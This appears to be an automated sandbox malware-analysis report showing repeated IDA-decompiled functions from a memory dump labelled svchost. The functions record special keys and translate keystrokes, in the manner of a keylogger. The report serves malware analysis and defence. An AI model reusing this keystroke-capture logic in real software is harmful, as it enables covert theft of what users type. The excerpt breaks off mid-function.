Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F9], xrefs: 00C85C27
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85DAE, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DAE(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Print Screen]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Print Screen], xrefs: 00C85DB0

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8595B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8595B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Back Tab]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Back Tab], xrefs: 00C8595D
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85DBC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DBC(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Up]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Arrow Up], xrefs: 00C85DBE

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85DD8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DD8(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Volume Mute]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Volume Mute], xrefs: 00C85DDA

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85DCA, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DCA(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Volume Down]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Volume Down], xrefs: 00C85DCC

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85A38, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A38(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Accept]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Accept], xrefs: 00C85A3A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85C9C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C9C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Left]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
